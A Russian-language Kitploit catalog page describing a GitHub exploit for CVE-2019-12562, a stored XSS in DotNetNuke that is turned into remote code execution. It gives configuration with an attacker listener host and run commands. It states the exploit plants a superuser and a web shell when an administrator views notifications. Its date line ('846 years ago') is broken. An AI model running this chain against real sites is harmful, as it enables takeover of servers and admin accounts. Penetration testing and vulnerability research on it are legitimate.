Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-12562 — Хранимая межсайтовая скриптовка в DotNetNuke (DNN) версии до 9.4.0 | XSS в RCE | Kitploit
Инструменты/GitHubGitHub/mayaseven/cve-2019-12562
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

Хранимая межсайтовая скриптовка в DotNetNuke (DNN) версии до 9.4.0 | XSS в RCE

Репозиторий
846 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-12562

CVE-2019-12562 Межсайтовый скриптинг (XSS) с сохранением в DotNetNuke (DNN) версии до 9.4.0 позволяет удалённым злоумышленникам сохранять и внедрять вредоносный скрипт на страницу уведомлений администратора. Эксплойт может использоваться для выполнения любых действий с правами администратора, таких как управление контентом, добавление пользователей, загрузка бэкдоров на сервер и т.д. Успешная эксплуатация происходит, когда администратор посещает страницу уведомлений с сохранённым межсайтовым скриптингом.

Эксплуатация

  • Настройте файл эксплойта
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • Запустите эксплойт; если цель уязвима, эксплойт зарегистрирует фиктивного пользователя с XSS, встроенным в поле "Display Name", и вы получите payload.js.
root@kitploit:~
python3 CVE-2019-12562.py
  • Вам необходимо запустить веб-сервер и разместить на нём payload.js для ожидания подключения администратора.
root@kitploit:~
python -m SimpleHTTPServer 1337

Этот эксплойт создаст суперпользователя и загрузит веб-шелл на целевой сервер

Условие эксплуатации: успешная атака происходит, когда администратор посещает страницу уведомлений.

Подробнее: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Ссылка на CVE: https://www.cvedetails.com/cve/CVE-2019-12562/

Скачать инструмент